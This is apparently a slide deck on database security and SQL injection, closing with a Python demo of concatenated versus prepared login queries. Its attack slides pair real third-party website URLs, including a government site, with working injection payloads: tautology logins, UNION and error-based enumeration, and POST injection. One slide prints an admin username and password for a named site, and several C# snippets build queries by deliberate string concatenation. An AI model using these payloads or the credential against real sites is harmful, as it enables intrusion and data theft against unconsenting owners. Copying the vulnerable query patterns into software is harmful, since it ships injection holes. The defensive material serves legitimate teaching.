DATABASE & DATABASE SECURITY
BY REHAN MANZOOR

What actually is a database
• Code and Filing concept

History of Database

Major Database Vendors

Interaction with Database

How we Interact (Direct Queries)

Custom defined functions

Stored Procedures

Integration with Languages

Static Apps

Dynamic Apps

Need in CMS

How We Integrate
• Well, that is the real question: how do we integrate? It creates a problem when we don't attach the app to the database correctly. The code is important.

Contents (continued)
• Database Attacks
• What is a Database Attack
• Explanation
• OWASP Rating (damage rate)
• Destruction of SQL injection
• History Reviews
• Recent bidding in underground

Database Attacks
• Excessive Privileges
• Privilege abuse
• Unauthorized privilege elevation
• Platform Vulnerabilities
• SQL Injection
• Weak Audit
• Denial of Service

Top 10 vulnerabilities by OWASP

Destruction of SQL Injection Attack
• Heartland Payment Systems: This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.
• TJX: More than 45 million people had their credit card details stolen, and some experts said the actual figure was likely to be closer to 94 million.

Recent Bidding in Underground

Login on Live Sites
• http://www.equinet.ch/fr/gestion/login.php
• 1' OR '1'='1
• http://lionsclubofwashim.co.in/admin.php
• 1' OR '1'='1
• admin.axilbusiness.in
• 1' OR '1'='1
• http://www.anemos.in/admin/
• 1' OR '1'='1
• Query Code
  // The login query as built on the slide: the two text-box values are concatenated straight into the SQL text (deliberately vulnerable).
  string query = "select username, password from admin where username='" + txtUserName.Text + "' and password='" + txtPassword.Text + "';";

Union based attack
• http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,null-- -
• http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables--
• http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null --
• Code
  // The page query as built on the slide: the id query-string value is concatenated into the SQL text (deliberately vulnerable).
  string query = "select * from tblName where id='" + Request.QueryString["id"] + "';";

Error Based Attack
• http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
• http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2
• http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown
• http://www.grabbbit.com/admin/login.aspx
• userid admin
• password grabbbit$
• Code
  // The joined query as built on the slide: the id query-string value is concatenated into the SQL text (deliberately vulnerable).
  string query = "select column1, column2, column3 from table1 join table2 on table1.column1 = table2.column1 where id='" + Request.QueryString["id"] + "';";

Blind Attack
• fgcineplex.com.sg/Images/slideshow/sizzlingsoul.php
• Code: the query is the same as in the union case, but the problem here is with the labels. The designer's labels are not picked up: either they are also stored in the database, or they cannot work with a union.

POST SQL Injection
• URL: http://haryanapolice.gov.in/police/pressreleases/search.asp
• POST body: text1=rummy'&text2=11/11/2010&SUBMIT=search
• Code
  // The search query as built on the slide: both form fields are concatenated into the SQL text (deliberately vulnerable).
  string query = "select * from tablename where text1='" + Request.Form["text1"].ToString() + "' and text2='" + Request.Form["text2"].ToString() + "';";

Why SQL Injection Is Possible
• Who is responsible: the database or the programmer?
• Why not to blame the database
• The database's secure nature
• Lack of awareness
• No research-based study
• Lack of interest
• Non-professional coders

Detection of SQL Injection
• Manual Check
  • Why
  • How
  • By Whom
• Automated Check
  • Tools
  • Scanners

Securing From SQL Injection
• Learn about it
• Firewalls
• By code:
  • Don't disclose any parameter if possible
  • Give the session user the least possible rights
  • Blacklist evil keywords for the session user
  • User input validation
  • Use prepared statements
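The login query from the "Login on Live Sites" slide and the prepared-statement fix recommended above, side by side in runnable form. This is an added example, not code from the deck: it uses Python's sqlite3 with an in-memory admin table holding constructed sample rows, and feeds the deck's own 1' OR '1'='1 input to both versions so the difference is observable.

```python
import sqlite3

# Constructed sample rows for the demo; a real system stores password hashes, not plaintext.
ADMIN_ROWS = [("admin", "placeholder-secret"), ("ops", "placeholder-other")]

# The deck's own test input from the "Login on Live Sites" slide.
TAUTOLOGY_INPUT = "1' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the slide's `admin` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO admin VALUES (?, ?)", ADMIN_ROWS)
    conn.commit()
    return conn


def login_concatenated(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The slide's query as written: user input is pasted into the SQL text (vulnerable)."""
    sql = ("select username, password from admin where username='" + username
           + "' and password='" + password + "';")
    # With the tautology input the WHERE clause becomes
    # username='1' OR '1'='1' and password='1' OR '1'='1', which matches every row.
    return conn.execute(sql).fetchone() is not None


def login_prepared(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with bound parameters: the driver keeps the input out of the SQL text."""
    sql = "select username, password from admin where username=? and password=?"
    # The tautology string is compared as a literal username, so no row matches.
    return conn.execute(sql, (username, password)).fetchone() is not None


def compare(conn: sqlite3.Connection, username: str, password: str) -> dict:
    """Run both variants on the same input so the difference is visible in one call."""
    return {
        "concatenated": login_concatenated(conn, username, password),
        "prepared": login_prepared(conn, username, password),
    }


if __name__ == "__main__":
    db = make_db()
    print("valid credentials:", compare(db, "admin", "placeholder-secret"))
    print("tautology input  :", compare(db, TAUTOLOGY_INPUT, TAUTOLOGY_INPUT))
```

The prepared form fixes the injection only; the other items on the slide (least-privilege session user, input validation) still apply, since a bound parameter does nothing about what the database account is allowed to do.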

More on Firewalls
• Use of firewall
  • As it is
  • Customized
• Buffer overflows
• Null bytes
• Difference between a normal user and a hacker

Buffer Overflows
• Live example: https://www.qmensolutions.com/remote_support_packs.php?packs=9%27--%20-
• Bypassing from keyword

Live Hack Of A Website
• http://aquaservices.co.in/

Conclusion
• Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.
